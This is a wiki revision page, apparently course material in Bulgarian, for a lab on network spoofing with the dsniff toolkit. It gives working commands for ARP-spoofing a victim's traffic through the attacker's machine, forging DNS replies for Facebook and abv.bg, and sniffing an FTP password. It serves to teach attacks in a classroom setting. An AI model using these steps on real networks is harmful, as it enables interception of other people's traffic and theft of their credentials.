Difference between revisions of "Spoofing"

From Ilianko
 
(21 intermediate revisions by the same user not shown)
Line 1: Line 1:
This package contains several tools to listen to and create network traffic:
+
== dsniff ==
  
arpspoof  - Send out unrequested (and possibly forged) arp replies.
+
[http://monkey.org/~dugsong/dsniff/ dsniff] Включва различни инструменти даващи възможност за "компрометиране на мрежата"
  
dnsspoof  - forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
+
'''Включени инструменти:'''
 
+
*[http://su2.info/doc/arpspoof.php arpspoof]  - Send out unrequested (and possibly forged) arp replies.
dsniff    - password sniffer for several protocols.
+
*dnsspoof  - forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
 +
*dsniff    - password sniffer for several protocols.
  
 
filesnarf - saves selected files sniffed from NFS traffic.
 
filesnarf - saves selected files sniffed from NFS traffic.
Line 28: Line 29:
  
 
webspy    - sends URLs sniffed from a client to your local browser (requires libx11-6 installed).
 
webspy    - sends URLs sniffed from a client to your local browser (requires libx11-6 installed).
 +
 +
Инсталация:
 +
 +
:~$ apt-get install dsniff
 +
 +
== Пренасочване на трафика с arpspoof ==
 +
 +
'''Задача:''' Да се пренасочи чужд трафик през вашата машина.
 +
 +
*victim - машината, която ще се подслушва
 +
*gateway - рутер на мрежата
 +
 +
Задачата да се изпълни по двама (на два компютъра).
 +
*Victim ще бъде потребител на първия компютър. Ще отваря различни страници.
 +
*На вторият компютър ще има стартирана виртуалка с Linux, от която ще се прави атаката за пренасочване на трафика. На вторият компютър ще има стартиран tcpdump който ще записва трафика.
 +
** ''tcpdump "port 80" -w trafik''
 +
*След определен време да се спре tcpdump файла с трафика да се разгледа с Wireshark
 +
 +
стартиране на arpspoof
 +
$arpspoof victim -t gateway
 +
$arpspoof gateway -t victim
 +
 +
Включване на  IP forwarding, иначе жертвата ще загуби свързаност
 +
$echo 1 > /proc/sys/net/ipv4/ip_forward
 +
 +
== dnsspoof ==
 +
1. Създаване на web сървър.
 +
 +
2. Конфигуриране домeйните, които искаме да фалшифицираме.
 +
Заменете в примерния файл IP адресите с адреса на вашия web server, a имената на домейни с домейните, които искаме да фалшифицираме.
 +
 +
Създаване на файл.
 +
$nano host.new
 +
 +
Примерно съдържание.
 +
172.16.16.165 *.facebook.com
 +
172.16.16.165 *.abv.bg
 +
 +
2. Стартирайте на програмата като администратор
 +
 +
$dnsspoof -f host.new
 +
 +
 +
След стартиране програмата слуша за dns запитвания.
 +
 +
== dsniff ==
 +
 +
Реализирайте ftp връзка. Използвайте dsniff за да прихванете паролата
 +
 +
== Използване на scp ==
 +
 +
==mailsnarf ==
 +
 +
[[Category:Мрежова сигурност]]

Latest revision as of 09:38, 17 October 2015

dsniff

dsniff Включва различни инструменти даващи възможност за "компрометиране на мрежата"

Включени инструменти:

  • arpspoof - Send out unrequested (and possibly forged) arp replies.
  • dnsspoof - forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
  • dsniff - password sniffer for several protocols.

filesnarf - saves selected files sniffed from NFS traffic.

macof - flood the local network with random MAC addresses.

mailsnarf - sniffs mail on the LAN and stores it in mbox format.

msgsnarf - record selected messages from different Instant Messengers.

sshmitm - SSH monkey-in-the-middle. proxies and sniffs SSH traffic.

sshow - SSH traffic analyser.

tcpkill - kills specified in-progress TCP connections.

tcpnice - slow down specified TCP connections via "active" traffic shaping.

urlsnarf - output selected URLs sniffed from HTTP traffic in CLF.

webmitm - HTTP / HTTPS monkey-in-the-middle. transparently proxies.

webspy - sends URLs sniffed from a client to your local browser (requires libx11-6 installed).

Инсталация:

:~$ apt-get install dsniff

Пренасочване на трафика с arpspoof

Задача: Да се пренасочи чужд трафик през вашата машина.

  • victim - машината, която ще се подслушва
  • gateway - рутер на мрежата

Задачата да се изпълни по двама (на два компютъра).

  • Victim ще бъде потребител на първия компютър. Ще отваря различни страници.
  • На вторият компютър ще има стартирана виртуалка с Linux, от която ще се прави атаката за пренасочване на трафика. На вторият компютър ще има стартиран tcpdump който ще записва трафика.
    • tcpdump "port 80" -w trafik
  • След определен време да се спре tcpdump файла с трафика да се разгледа с Wireshark

стартиране на arpspoof

$arpspoof victim -t gateway
$arpspoof gateway -t victim

Включване на IP forwarding, иначе жертвата ще загуби свързаност

$echo 1 > /proc/sys/net/ipv4/ip_forward

dnsspoof

1. Създаване на web сървър.

2. Конфигуриране домeйните, които искаме да фалшифицираме. Заменете в примерния файл IP адресите с адреса на вашия web server, a имената на домейни с домейните, които искаме да фалшифицираме.

Създаване на файл.

$nano host.new 

Примерно съдържание.

172.16.16.165 *.facebook.com
172.16.16.165 *.abv.bg

2. Стартирайте на програмата като администратор

$dnsspoof -f host.new


След стартиране програмата слуша за dns запитвания.

dsniff

Реализирайте ftp връзка. Използвайте dsniff за да прихванете паролата

Използване на scp

mailsnarf